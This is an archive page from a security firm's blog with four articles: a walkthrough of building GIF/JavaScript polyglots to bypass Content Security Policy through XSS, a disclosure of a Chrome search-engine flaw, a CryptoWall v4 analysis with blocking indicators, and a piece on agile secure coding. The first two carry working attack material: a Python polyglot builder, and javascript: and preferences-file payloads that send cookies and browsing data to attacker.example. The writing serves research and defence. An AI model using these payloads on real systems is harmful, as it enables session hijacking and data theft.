
Monthly Archives: January 2018

Malicious Memes


The content of this article was also presented by Sam at the 2016 Unrest Conference.

In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?

Background

Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).

Content Security Policy (CSP)

The CSP is set by the web server in the form of a header and informs the user’s browser to only load and execute objects that originate from a certain set of whitelisted sources. For example, a common implementation of the CSP header ensures the browser only accepts scripts that come from your domain and blocks the use of inline scripts (i.e., scripts blended directly with other client-side code such as HTML). CSP is a recommended security header for mitigating the damage caused by Cross-Site Scripting vulnerabilities, as it narrows the attack surface from which malicious scripts can be loaded. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.
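As a rough illustration (the directive values below are an example, not a prescription), a strict policy might look like:

```
Content-Security-Policy: default-src 'self'; script-src 'self'
```

With this header in place the browser loads scripts only from the application’s own origin and refuses inline scripts, since ‘unsafe-inline’ is not whitelisted.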

Cross-Site Scripting (XSS)

XSS attacks are a type of web application injection exploit in which an attacker is able to embed their own client-side code into a web application and have it rendered in the browser as part of the webpage. Usually caused by a lack of (or poorly implemented) user input sanitisation and encoding, XSS vulnerabilities allow attackers to inject malicious JavaScript (JS) that can be used to hijack users’ sessions, modify content on the webpage, redirect the visitor to another website or ‘hook’ the victim’s browser. Browser hooking is a technique for leveraging XSS vulnerabilities in which the XSS is used to load scripts from a server operated by the attacker, granting greater control over the hooked browser’s behaviour.

XSS is one of the most common web application vulnerabilities and many major websites — including Google, PayPal, eBay, Facebook and the Australian Government’s My Gov site — have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injection is reflected back to the victim, rather than being stored on the web server. They are usually executed when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be ‘inline’ with the web application as it is loaded alongside other client side code like Hyper Text Markup Language (HTML) and not from a dedicated JS file. CSP can be configured to deny inline scripts from being executed in the browser which in theory mitigates the dangers of a reflected XSS and protects the user.

CSP in action — and how to get around it

Take for example a web application that allows you to upload and view images and has an aggressive CSP that only permits loading scripts from the application’s domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You attempt to upload your payload through the image upload but the web application rejects it for not being a valid image. An image polyglot can help you get around those pesky security controls.

Polyglots

In humans, a ‘polyglot’ is someone who speaks several languages. In the computer world it means code that is valid in several programming languages.

Figure 1 — Valid ‘C’ programming code

Figure 2 — Valid ‘Perl’ programming code

The code snippets in Figure 1 and Figure 2 are identical and yet also cross-compatible. This is polyglot code and is the underlying mechanism for the attack detailed in this tech blog.
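To make the idea concrete, here is a small sketch of the kind of snippet Figures 1 and 2 depict (an illustrative reconstruction, not the exact code from the figures). The lines beginning with ‘#’ are comments to Perl but preprocessor directives to C, so each language sees a different program in the same bytes:

```
#include <stdio.h>
#define print(A) int main(void){puts("Hello from C");return 0;} int unused
print("Hello from Perl\n");
```

Compiled as C, the macro expands the last line into a main() that prints ‘Hello from C’; run as Perl, the first two lines are comments and the print call executes directly.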

GIF Images

You have more than likely heard of the Graphics Interchange Format (GIF) image type which has the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989. It has since come into widespread use on the Internet largely due to its support for animation.

Figure 3 — An animated GIF image

GIF images only support a 256 colour palette for each frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety making the format inefficient for displaying detailed clips of any longer than a few seconds (incidentally, while the pronunciation is often disputed, I can confirm for you right now it’s pronounced ‘jiff’ after an American brand of peanut butter — no joke).

Figure 4 — The constructs of a GIF image sourced from: http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

The attack this blog will demonstrate only requires knowledge of the ‘Header’, ‘Trailer’ and ‘Logical Screen Descriptor’ (LSD). The data in between these represent each frame of a GIF image. At least one frame is expected in a valid GIF. All GIF images begin with the signature ‘GIF’ followed by the version represented as ‘87a’ or ‘89a’ in the header.

Figure 5 — The header of a GIF version 89 image in hexadecimal and corresponding human readable ASCII encoded output

The following seven bytes of a GIF image make up the LSD, which informs the image decoder of properties that affect the whole image. The first four bytes are the canvas width and height, each stored as an unsigned 16-bit integer. A 16-bit unsigned integer is a number between 0 and 65,535 that cannot be negative (it wouldn’t make much sense to have a negative canvas size!).

Figure 6 — The LSD of a GIF image sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

It is also important to understand that this data in the GIF format is represented in ‘little-endian’ order, which means the least significant byte is stored and read first by the decoder. In Figure 6 we can see the canvas size is stored as width: ‘0A 00’ and height: ‘0A 00’. While seemingly backwards for humans, little-endian means the decoder interprets these as width: ‘000A’ and height: ‘000A’, which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is represented by hexadecimal ‘3B’, which when encoded as ASCII represents a semicolon.
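As a quick sketch (the function and sample bytes are illustrative, not from the original post), the header and LSD can be pulled apart with a few lines of Python; note the ‘<’ in the struct format string, which tells the parser to read the 16-bit values little-endian:

```python
import struct

def parse_gif_lsd(data: bytes):
    """Return (version, canvas width, canvas height) from a GIF's first bytes."""
    signature, version = data[:3], data[3:6]
    assert signature == b"GIF" and version in (b"87a", b"89a")
    # '<HH': two unsigned 16-bit integers, least significant byte first
    width, height = struct.unpack("<HH", data[6:10])
    return version.decode(), width, height

# Header and LSD bytes matching Figures 5 and 6: width 0A 00, height 0A 00
sample = b"GIF89a\x0a\x00\x0a\x00\x91\x00\x00"
print(parse_gif_lsd(sample))  # ('89a', 10, 10)
```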

Figure 7 — The hexadecimal and ASCII encoded output showing the footer of a GIF image

Most image decoders, including browsers, will ignore anything after the trailing semicolon, making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image, data after the semicolon will likely be discarded. Hence, it’s important that we can still access the raw, unedited image after it’s uploaded to the server — see the ‘Limitations’ section of this blog for more information.

Creating the GIF/JS Polyglot

Figure 8 — Our ‘soon to be JS’ GIF sourced from http://www.matthewflickinger.com/lab/whatsinagif/bits_and_bytes.asp

To create our malicious image, we are using a small, non-animated GIF image as seen in Figure 8. Its ASCII encoded output is represented below:

Figure 9 — ASCII encoded output of GIF image data

One method of creating GIF/JS polyglots is by manipulating the LSD to begin a JS comment block, as seen in Figure 10. After the GIF trailer we close the comment block and include our payload.

Figure 10 — GIF image with JS payload appended

You will notice that in order to implement the ‘/*’ (begin comment block) JS command we have changed the value of the first two bytes of the LSD which correspond to the canvas width. The hexadecimal value of ‘/*’ is ‘2F 2A’ which when interpreted as little-endian by the image decoder is ‘2A 2F = 10799’. While we still have a valid GIF image, it has a pretty whacky canvas size as seen in the output below:

Figure 11 — EXIFtools output of GIF/JS polyglot image showing a canvas size of 10799x10px

However, other than being oddly sized, the image is still perfectly valid and the image decoder will read the rest of the image data normally, disregarding our JS code after the image trailer.
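The byte surgery described above can be sketched in a few lines of Python (the helper name and sample bytes are illustrative, not from the original post):

```python
def make_polyglot(gif_bytes: bytes, js_payload: bytes) -> bytes:
    """Patch a GIF so it is simultaneously a valid image and a JS file."""
    assert gif_bytes[:6] in (b"GIF87a", b"GIF89a")
    patched = bytearray(gif_bytes)
    # Overwrite the 2-byte canvas width with '/*' (0x2F 0x2A). A JS engine
    # sees the start of a comment block; the decoder sees width 0x2A2F = 10799.
    patched[6:8] = b"/*"
    # After the GIF trailer (0x3B, ';'), close the comment, assign the
    # 'GIF89a' identifier a dummy value of 1 to keep the syntax valid,
    # then append the payload.
    return bytes(patched) + b"*/=1;" + js_payload

# A minimal GIF stub (not meaningfully decodable), just for demonstration:
polyglot = make_polyglot(b"GIF89a\x0a\x00\x0a\x00\x91\x00\x00\x3b",
                         b"alert(document.domain);")
print(polyglot[:8])  # b'GIF89a/*'
```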

Figure 12 — The GIF/JS polyglot as interpreted by a JS engine

When we try to execute the image as JS, the engine reads the GIF header as a variable name, ignores the comment block, and then sets the variable equal to ‘1’, a dummy value used to ensure the JS syntax remains valid. Then our payload is executed.

The image passes standard image validation techniques used by web applications, which often rely on confirming the image’s ‘magic number’ (the identifying signature bytes at the start of the file). Once our image is uploaded to the server, we effectively have a valid JS file originating from the web application’s domain, which falls within the context of the CSP.
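A naive validation routine of the kind described might look like this sketch (hypothetical, for illustration only):

```python
def passes_upload_check(data: bytes) -> bool:
    # Only the magic number at the start of the stream is inspected,
    # so anything appended after a valid GIF structure goes unnoticed.
    return data[:6] in (b"GIF87a", b"GIF89a")

print(passes_upload_check(b"GIF89a/*...*/=1;alert(1);"))  # True
```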

As it stands, the image is loaded into the web application through the use of the HTML ‘img’ tag, which informs the browser to interpret the data stream as image data. In order to circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the image with an HTML ‘script’ tag whose ‘src’ attribute points at the uploaded image.
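For example, the reflected XSS could be used to inject markup along these lines (the domain and path are illustrative):

```html
<script src="https://vulnerable.example/uploads/polyglot.gif"></script>
```

Because the script now originates from the application’s own domain, the CSP considers it whitelisted and allows it to execute.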

Figure 13 — Leveraging the reflected XSS to execute our polyglot

Figure 14 — XSS payload executing in browser bypassing CSP

Why GIFs?

The convenient design structure of the GIF file format allows us to leverage the image header and manipulate the canvas sizes defined in the LSD without destroying the properties of the image for the image decoder.

Limitations

  • Web applications that restrict image uploads to a certain canvas size can hinder the effectiveness of an image polyglot. Due to the limited number of JS characters that can be used in the LSD, the canvas sizes are often unusually large and cannot conform to strict image upload pixel rules.
  • Server side image manipulation that resizes the image will edit the canvas size in the LSD; corrupting our polyglot. If it’s not possible to locate the original unedited image through the web application, then the image will not execute as JS.

Conclusion

While Figure 14 demonstrates a rather mundane script execution, it confirms we now have a method of uploading and executing an XSS attack regardless of the CSP directive. The stored JS in our image acts as an uploaded script file satisfying the CSP’s same-origin requirements.

This attack proves that CSP isn’t a catch-all XSS filter and can be circumvented in some cases. In application penetration testing, GIF/JS polyglots are a powerful tool for leveraging the consequences of improper output sanitisation.

While still recommended, the CSP header should be implemented with the understanding that it is a last line of defence against XSS attacks, not a guarantee of protection for your web app. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.


Article by Sam Reid, Security Specialist, Hivint

Google Chrome — Default Search Engine Vulnerability


Introduction

In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.

This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.

The vulnerability in the Chrome browser is due to the “Default Search Engine” functionality not restricting user input and allowing JavaScript code to be inserted and executed. The Default Search Engine functionality allows users to save and configure preferred search engines. When a user performs a search from the web browser by entering the search text directly into the URL bar, the web browser uses the default search settings configured earlier to perform this search.


Chrome Default search settings — with the Google search engine configured as the default search engine

To prevent unintended and unauthorised actions, data provided by users should be sanitised and/or restricted so that malicious input (in this case, JavaScript code supplied to the browser) is rejected. Input sanitisation involves checking the text and characters a user enters and ensuring they do not contain any malicious code.

Given that Google Chrome is the most popular web browser, used by approximately 71.4% of all internet users, this vulnerability presents a significant security risk.

What is JavaScript and how can it be exploited maliciously?

JavaScript is one of the core programming languages used for web applications and its main function is in modifying the behaviour of web pages. It is extremely flexible and is often used to dynamically change the content on websites to provide a rich user experience.

Although JavaScript is normally used to improve a user’s web experience, it can also be used in malicious ways which include stealing personal information and sensitive data from target users.

Examples of JavaScript that can be used for malicious purposes using the vulnerability discussed in this article are:

  • escape(document.cookie); – Which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
  • escape(navigator.userAgent); – Used to display a target user’s web-browser type.
  • escape(document.baseURI); – Contains the URL of the website the user is currently browsing.

The examples above are only a small sample of JavaScript that can be used for malicious purposes with the vulnerability identified in this article.
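Combined into a single payload, a hypothetical malicious search-engine URL could ship all three values to an attacker-controlled server (the domain is illustrative):

```
javascript:window.location='https://attacker.example/log?c='+escape(document.cookie)+'&u='+escape(document.baseURI)+'&a='+escape(navigator.userAgent);
```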

How to check if you’re vulnerable

To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:

  1. Navigate to Settings > Manage Search Engines.
  2. Scroll to the bottom of the Other Search Engines table.
  3. Click in the box marked Add a new search engine and enter any text, e.g. poison.
  4. Click in the box marked Keyword and enter any text, e.g. poison.
  5. Click in the box marked URL with %s in place of query and paste in the following text: javascript:window.location=alert(1);
  6. If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.


Exploit Example

Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.

The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.

This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:
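The original post included the script itself; as a rough sketch of the idea (the key names and domain below are illustrative rather than the exact Chrome schema), the malicious file sets a ‘search URL’ that exfiltrates data before returning the victim to their search:

```json
{
  "default_search_provider": {
    "enabled": true,
    "name": "Google",
    "keyword": "google.com",
    "search_url": "javascript:window.location='https://attacker.example/c?d='+escape(document.cookie)+'&q=%s';"
  }
}
```

In the actual exploit the injected JavaScript forwards the stolen data to the attacker’s server, which then redirects the victim back to their original Google search results.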


Video Demo

This video demonstrates how the vulnerability can be exploited:

  1. The user is tricked into loading malicious software.
  2. The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’ in their browser
  3. Information is transmitted and intercepted by the attacker and the victim is then unknowingly redirected back to their search with the attack remaining undetected

How can I prevent myself from being exploited?

Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.


Article by Taran Dhillon, Security Specialist, Hivint

CryptoWall — Analysis and Behaviours


Key Behaviours of CryptoWall v4

This document details some initial research undertaken by Hivint into the newly released CryptoWall version 4 series of ransomware. A number of organisations we have worked with have experienced infections by CryptoWall and its variants, in some cases leading to severe consequences.

This research paper outlines more information about the latest version of CryptoWall, as well as providing guidance on possible methods for creating custom security controls within your IT environment to mitigate the threat of CryptoWall infections, as well as how to detect and respond to these infections if they do occur. Some lists of known payload sources, e-mail domains and payment pages associated with CryptoWall are also provided at the end of this paper for use in firewall rulesets and/or intrusion detection systems.

CryptoWall version 4 exhibits the following new behaviours:

  • It now encrypts not only the data in your files, but the file names as well.
  • It still includes malware dropper mechanisms to avoid anti-virus detection — but this new version also possesses vastly improved communication capabilities. It still uses TOR, which it may be possible to block with packet-inspection functions on some firewalls. However, it has a modified version of the protocol that attempts to avoid being detected by 2nd generation enterprise firewall solutions.
  • It appears to inject itself into or migrate to svchost.exe and iexplore.exe. It also calls bcdedit.exe to disable the start-up restore feature of Windows. This means the system restore functions that were able to recover data in previous versions of the ransomware no longer work.

Infection Detection

Antivirus detection for this variant is generally very low, but some work on detection is taking place. ESET’s anti-virus solution, for example, detects the .js files used by CryptoWall in emails as JS/TrojanDownloader.Agent.

The most reliable method to detect Cryptowall v4 infections when creating rules in intrusion detection systems, firewalls, antivirus systems, or centralised log management servers is to create a rule to alert on creation of the following filenames, which are static within CryptoWall v4:

  • HELP_YOUR_FILES.TXT
  • HELP_YOUR_FILES.HTML
  • HELP_YOUR_FILES.PNG
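As a sketch of what such a rule could look like on a file server (the helper name is illustrative), a scheduled scan might simply walk the tree for these static names:

```python
import os

# Static ransom-note filenames dropped by CryptoWall v4
RANSOM_NOTES = {"HELP_YOUR_FILES.TXT", "HELP_YOUR_FILES.HTML", "HELP_YOUR_FILES.PNG"}

def find_ransom_notes(root: str):
    """Walk a directory tree and return paths of CryptoWall v4 ransom notes."""
    hits = []
    for dirpath, _subdirs, filenames in os.walk(root):
        for name in filenames:
            if name.upper() in RANSOM_NOTES:
                hits.append(os.path.join(dirpath, name))
    return hits
```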

It’s also worth noting that having in place a comprehensive, regular and consistent backup process for key organisational data is extremely important to combat the threat posed by ransomware such as CryptoWall v4. This will facilitate the prompt restoration of important files, limiting impacts on productivity.

Limiting the risk of Infection

CryptoWall v4 connects to a series of compromised web pages to download the payload. Some of the domain names hosting compromised pages are listed below — a useful step would be to create a regular expression on firewalls and other systems to block access to these domains:

  • pastimefoods.com
  • 19bee88.com
  • adrive62.com
  • httthanglong.com

Note that the list of compromised web pages is constantly evolving and so the implemented regular expression will require ongoing maintenance within corporate networks. See the lists at the end for more domains.
 
In the new version of CryptoWall, infected files have their file names appended with pseudorandom strings. As a result, filename encryption is harder to identify through pure examination of file extension names, unlike past versions of CryptoWall (in which ‘.encrypted’ was appended to the end of encrypted files). Thus, implementing an alert or blocking mechanism becomes more challenging.
 
However, it is possible to implement regular expression-based rules by considering the executable file names which are downloaded as part of an attempt to infect a system with CryptoWallv4. These are two known to be associated with CryptoWall v4 infections:

It may also be possible to write detection rules to find a static registry key indicating the presence of a CryptoWall infection. This can then be used to search over an entire corporate domain to locate infected machines, or possibly used in anti-virus / IDS signatures. An example is:

  • HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run a6c784cb “C:\Users\admin\AppData\Roaming\a6c784cb\4ae38306a6.exe”

Another step to consider is writing a custom list for corporate firewalls containing the domains that phishing e-mails associated with CryptoWall v4 infections are known to come from, as well as a list of known command-and-control servers. For example, one of the first e-mail domains to be reported was 163.com. In addition, some of the known command and control hosts that the ransomware makes calls to include:

  • mabawamathare.org
  • 184.168.47.225
  • 198.20.114.210
  • 143.95.248.187
  • 64.247.179.218
  • 52.91.146.127
  • 103.21.59.9

CryptoWall v4 also makes use of Google’s 8.8.8.8 service for DNS — this behaviour can be taken into account as part of determining whether there are additional security controls that can be implemented to mitigate the risk of infection. In addition, it appears that CryptoWall v4 makes outgoing calls to the following URLs (among others). These may also be useful in developing infection detection controls:

The initial controls we have worked with most customers to implement on their corporate networks included adding a rule to anti-virus detection systems to identify the ransom note file when it is created (i.e. HELP_YOUR_FILES.TXT). This enables network administrators to be promptly alerted to infections on the network. This is a valuable strategy in conjunction with maintaining lists of known bad domains related to the malware’s infection sources and infrastructure.

Lists of known payload sources, e-mail domains and payment pages associated with CryptoWall

We’ve included the following lists of payload sources, domains and pages associated with Cryptowall v4 infections — which some of our clients have used — to identify activity potentially associated with the ransomware. These can be used in addition to blacklists created and maintained by firewall and IDS vendors:

  • Decrypt Service — contains a small list of the IP addresses for the decryption service. This is the page victims are directed to in order to pay the authors of Cryptowall for the decryption keys. These servers are located on the TOR Network but use servers on the regular web as proxies.
  • Email Origin IPs — contains IP addresses of known sources of CryptoWall v4 phishing e-mail origin servers — can be used in developing black lists on e-mail gateways and filtering services.
  • Outgoing DNS Requests — contains a list of IP addresses that CryptoWall v4 attempts to contact.
  • Payload Hosts — contains known sources of infection — including compromised web pages and other infection sources.

CryptoWall associated IP addresses

Article by John McColl, Principal Advisor, Hivint

Secure Coding in an Agile World: If The Slipper Fits, Wear It


Combining agile software development concepts in an increasingly cyber-security conscious world is a challenging hurdle for many organisations. We initially touched upon this in a previous article — An Elephant in Ballet Slippers? Bringing Agility To Cyber Security — in which Hivint discussed the need to embrace agile concepts in cyber security through informal peer-to-peer sharing of knowledge with development and operations teams and the importance of creating a culture of security within the organisation.

One of the most common and possibly biggest challenges when incorporating agility into security is the ability to effectively integrate security practices such as the use of Static Application Security Testing (SAST) tools in an agile development environment. The ongoing and rapid evolution of technology has served as a catalyst for some fast-paced organisations — wishing to stay ahead of the game — to deploy software releases on a daily basis. A by-product of this approach has been the introduction of agile development processes that have little room for security.

Ideally, security reviews should happen as often as possible prior to final software deployment and release, including prior to the transition from the development to staging environment, during the quality assurance process and finally prior to live release into production. However, these reviews will often require the reworking of source code to remediate security issues that have been identified. This obviously results in time imposts, which is often seen as a ‘blocker’ to the deployment pipeline. Yet the increase in media coverage of security issues in recent years highlights the importance of organisations doing all that they can to mitigate the risks of insecure software releases. This presents a significant conundrum: how do we maintain agility and stay ahead of the game, but still incorporate security into the development process?

One way of achieving this is through the use of a ‘hybrid’ approach that ensures any new software libraries, platforms or components being introduced into an organisation are thoroughly tested for security issues prior to release into the ‘agile’ development environment. This includes internal and external frameworks such as the reuse of internally created libraries or externally purchased software packages. Testing of any new software code introduced into an IT environment — whether externally sourced or internally produced — is typically contemplated as part of a traditional information security management system (ISMS) that many organisations have in place. Once that initial testing has taken place and appropriate remediation occurs for any identified security issues, the relevant software components are released into the agile environment and are able to be used by developers to build applications without the need for any further extensive testing.

For example, consider a .NET platform that implements a cryptographic function using a framework such as Bouncy Castle. Both the platform and framework are tested for security issues using various types of testing methodologies such as vulnerability assessments and penetration tests. The developers are then allowed to use them within the agile development environment for the purposes of building their applications.

When a new feature or software library / platform is required (or a major version upgrade to an existing software library / platform occurs), an evaluation will need to occur in conjunction with the organisation’s security team to determine the extent of the changes and the risks this will introduce to the organisation. If the changes / additions are deemed significant, then the testing and assurance processes contemplated by the overarching ISMS will need to be followed prior to their introduction into the agile development environment.

This hybrid approach provides the flexibility that’s required by many organisations seeking an agile approach to software development, while still ensuring there is an overarching security testing and assurance process that is in place. This approach facilitates fast-paced development cycles (organisations can perform daily or even hourly code releases without having to go through various types of security reviews and testing), yet still enables the deployment of software that uses secure coding principles.

It may be that fitting the ballet slippers (agility) onto the elephant (security) is not as improbable a concept as it once seemed.


Article by Craig Searle, Chief Apiarist, Hivint